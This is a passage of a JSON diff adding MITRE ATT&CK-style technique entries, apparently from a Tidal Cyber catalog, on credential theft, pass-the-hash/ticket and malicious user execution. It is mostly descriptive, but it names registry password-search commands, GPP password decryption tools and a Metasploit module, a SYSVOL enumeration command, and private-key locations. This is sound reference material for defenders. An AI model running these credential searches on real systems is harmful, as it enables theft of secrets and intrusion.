[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "065d1cca-8ca5-4f8b-a333-2340706f589e", + "value": "Bash History" + }, + { + "description": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.\n\nRather than accessing the stored chat logs (i.e., [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation [[Slack Security Risks](https://app.tidalcyber.com/references/4332430a-0dec-5942-88ce-21f6d02cc9a9)].", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.008" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "8e9cfd62-1a61-50dc-8f05-8a4914fd3853", + "value": "Chat Messages" + }, + { + "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.[[AWS Instance Metadata API](https://app.tidalcyber.com/references/54a17f92-d73d-469f-87b3-34fb633bd9ed)] A cloud metadata API has been used in at least one high profile compromise.[[Krebs Capital One August 2019](https://app.tidalcyber.com/references/7d917231-735c-40d8-806d-7fee60d2f996)]\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.[[RedLock Instance Metadata API 2018](https://app.tidalcyber.com/references/f85fa206-d5bf-41fc-a521-01ad6281bee7)]\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.005" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "a5a95893-d837-424a-979f-095a47dd9f34", + "value": "Cloud Instance Metadata API" + }, + { + "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)][[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)] An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.007" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "6f6b88df-039c-4b69-87e0-97dfabbb49d8", + "value": "Container API" + }, + { + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). [[CG 2014](https://app.tidalcyber.com/references/46836549-f7e9-45e1-8d89-4d25ba26dbd7)] Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. [[SRD GPP](https://app.tidalcyber.com/references/a15fff18-5d3f-4898-9e47-ec6ae7dda749)]\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)] They may also be found as parameters to deployment commands in container logs.[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)] In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.[[Specter Ops - Cloud Credential Storage](https://app.tidalcyber.com/references/95d6d1ce-ceba-48ee-88c4-0fb30058bd80)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "838c5038-91e7-4648-925e-a142c8c10853", + "value": "Credentials In Files" + }, + { + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: [[Pentestlab Stored Credentials](https://app.tidalcyber.com/references/5be9afb8-749e-45a2-8e86-b5e6dc167b41)]\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "cdac2469-52ca-42a8-aefe-0321a7e3d658", + "value": "Credentials in Registry" + }, + { + "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.[[Microsoft GPP 2016](https://app.tidalcyber.com/references/fa3beaf1-81e7-411b-849a-24cffaf7c552)]\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).[[Microsoft GPP Key](https://app.tidalcyber.com/references/24d8847b-d5de-4513-a55f-62c805dfa1dc)]\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: post/windows/gather/credentials/gpp\n* Get-GPPPassword[[Obscuresecurity Get-GPPPassword](https://app.tidalcyber.com/references/54351cf9-8d2a-47fb-92d5-fe64b628ab06)]\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.006" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "57dd1624-42e9-42a6-b1bb-d1d1df233138", + "value": "Group Policy Preferences" + }, + { + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.[[Wikipedia Public Key Crypto](https://app.tidalcyber.com/references/1b7514e7-477d-44a2-acee-d1819066dee4)] Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\\Users\\(username)\\.ssh\\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.[[Kaspersky Careto](https://app.tidalcyber.com/references/547f1a4a-7e4a-461d-8c19-f4775cd60ac0)][[Palo Alto Prince of Persia](https://app.tidalcyber.com/references/e08bfc40-a580-4fa3-9531-d5e1bede374e)]\n\nWhen a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.[[Microsoft Primary Refresh Token](https://app.tidalcyber.com/references/d23bf6dc-979b-5f34-86a7-637979a5f20e)] An adversary with access to the device may be able to export the keys in order to impersonate the device.[[AADInternals Azure AD Device Identities](https://app.tidalcyber.com/references/b5ef16c4-1db0-51e9-93ab-54a8e480debc)]\n\nOn network devices, private keys may be exported via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `crypto pki export`.[[cisco_deploy_rsa_keys](https://app.tidalcyber.com/references/132f387e-4ee3-51d3-a3b6-d61102ada152)] \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) for keylogging or attempt to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) like SSH or for use in decrypting other collected files such as email.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1552.004" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "e493bf4a-0eba-4e60-a7a6-c699084dc98a", + "value": "Private Keys" + }, + { + "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://app.tidalcyber.com/technique/065d1cca-8ca5-4f8b-a333-2340706f589e)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://app.tidalcyber.com/technique/cdac2469-52ca-42a8-aefe-0321a7e3d658)), or other specialized files/artifacts (e.g. [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a)).", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "065d1cca-8ca5-4f8b-a333-2340706f589e", + "type": "similar" + }, + { + "dest-uuid": "8e9cfd62-1a61-50dc-8f05-8a4914fd3853", + "type": "similar" + }, + { + "dest-uuid": "a5a95893-d837-424a-979f-095a47dd9f34", + "type": "similar" + }, + { + "dest-uuid": "6f6b88df-039c-4b69-87e0-97dfabbb49d8", + "type": "similar" + }, + { + "dest-uuid": "838c5038-91e7-4648-925e-a142c8c10853", + "type": "similar" + }, + { + "dest-uuid": "cdac2469-52ca-42a8-aefe-0321a7e3d658", + "type": "similar" + }, + { + "dest-uuid": "57dd1624-42e9-42a6-b1bb-d1d1df233138", + "type": "similar" + }, + { + "dest-uuid": "e493bf4a-0eba-4e60-a7a6-c699084dc98a", + "type": "similar" + } + ], + "uuid": "02ed857b-ba39-4fab-b1d9-3ed2aa689dfd", + "value": "Unsecured Credentials" + }, + { + "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f), which can cost organizations substantial amounts of money over time depending on the processing power used.[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]", + "meta": { + "platforms": [ + "IaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "edf9f7d7-bc14-4e25-800d-f508acb580d4", + "value": "Unused/Unsupported Cloud Regions" + }, + { + "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)] \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.[[okta](https://app.tidalcyber.com/references/61e2fb16-d04b-494c-8bea-fb34e81faa73)]\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.[[Microsoft Identity Platform Access 2019](https://app.tidalcyber.com/references/a39d976e-9b52-48f3-b5db-0ffd84ecd338)] With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.[[Staaldraad Phishing with OAuth 2017](https://app.tidalcyber.com/references/ae139c14-05ec-4c75-861b-15d86b4913fc)]\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.[[Google Cloud Service Account Credentials](https://app.tidalcyber.com/references/c4befa09-3c7f-49f3-bfcc-4fcbb7bace22)][[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)] The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.[[Rhino Security Labs Enumerating AWS Roles](https://app.tidalcyber.com/references/f403fc54-bdac-415a-9cc0-78803dd84214)]\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)] Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1550.001" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "8592f37d-850a-43d1-86f2-cc981ad7d7dc", + "value": "Application Access Token" + }, + { + "description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a) attacks.[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1550.002" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "33486e3e-1104-42d0-8053-34c8c9c4d10f", + "value": "Pass the Hash" + }, + { + "description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are captured by [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)][[GentilKiwi Pass the Ticket](https://app.tidalcyber.com/references/3ff12b9c-1c4e-4383-a771-792f5e95dcf1)]\n\nA [Silver Ticket](https://app.tidalcyber.com/technique/e7135af8-3668-4d94-90d2-2a93a6b5c327) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)]\n\nA [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.[[Campbell 2014](https://app.tidalcyber.com/references/8bef22ff-f2fc-4e1a-b4d2-d746a120f6c6)]\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f)) while also using the password hash to create a valid Kerberos ticket.[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1550.003" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "5e771f38-6286-4330-b7b4-38071ad6b68a", + "value": "Pass the Ticket" + }, + { + "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) or [Web Cookies](https://app.tidalcyber.com/technique/b0966c0f-1e09-4d5d-acff-0ca79dc9da89), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1550.004" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "d36a5323-e249-44e8-9c8b-5cc9c023a5e1", + "value": "Web Session Cookie" + }, + { + "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.[[NIST Authentication](https://app.tidalcyber.com/references/f3cfb9b9-62f4-4066-a2b9-7e6f25bd7a46)][[NIST MFA](https://app.tidalcyber.com/references/2f069bb2-3f59-409e-a337-7c69411c8b01)]\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n", + "meta": { + "platforms": [ + "Containers", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "8592f37d-850a-43d1-86f2-cc981ad7d7dc", + "type": "similar" + }, + { + "dest-uuid": "33486e3e-1104-42d0-8053-34c8c9c4d10f", + "type": "similar" + }, + { + "dest-uuid": "5e771f38-6286-4330-b7b4-38071ad6b68a", + "type": "similar" + }, + { + "dest-uuid": "d36a5323-e249-44e8-9c8b-5cc9c023a5e1", + "type": "similar" + } + ], + "uuid": "28f65214-95c1-4a72-b385-0b32cbcaea8f", + "value": "Use Alternate Authentication Material" + }, + { + "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) and [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.[[Password Protected Word Docs](https://app.tidalcyber.com/references/fe6f3ee6-b0a4-4092-947b-48e02a9255c1)] \n\nWhile [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1204.002" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "3412ca73-2f25-452a-8e6e-5c28fe72ef78", + "value": "Malicious File" + }, + { + "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.[[Summit Route Malicious AMIs](https://app.tidalcyber.com/references/e93e16fc-4ae4-4f1f-9d80-dc48c1c30e25)]\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://app.tidalcyber.com/technique/442f60ed-5195-45c3-9d8c-7e17cabe7869)).[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1204.003" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "f795ef6d-d2cf-440e-b871-ab19dc385789", + "value": "Malicious Image" + }, + { + "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609). Links may also lead users to download files that require execution via [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1204.001" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "46f60fff-71a1-4cfd-b639-71a0ac903bbb", + "value": "Malicious Link" + }, + { + "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).\n\nWhile [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).\n\nAdversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, tech support scams can be facilitated through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430).[[Telephone Attack Delivery](https://app.tidalcyber.com/references/9670da7b-0600-4072-9ecc-65a918b89ac5)]", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "3412ca73-2f25-452a-8e6e-5c28fe72ef78", + "type": "similar" + }, + { + "dest-uuid": "f795ef6d-d2cf-440e-b871-ab19dc385789", + "type": "similar" + }, + { + "dest-uuid": "46f60fff-71a1-4cfd-b639-71a0ac903bbb", + "type": "similar" + } + ], + "uuid": "b84435ab-2ff4-4b6f-ba71-b4b815474872", + "value": "User Execution" + }, + { + "description": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. [[AWS Identity Federation](https://app.tidalcyber.com/references/b55ac071-483b-4802-895f-ea4eaac1de92)][[Google Federating GC](https://app.tidalcyber.com/references/4e17ca9b-5c98-409b-9496-7c37fe9ee837)][[Microsoft Deploying AD Federation](https://app.tidalcyber.com/references/beeb460e-4dba-42fb-8109-0861cd0df562)]\n\nService or user accounts may be targeted by adversaries through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.\n\nAn adversary may create long lasting [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. \n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these 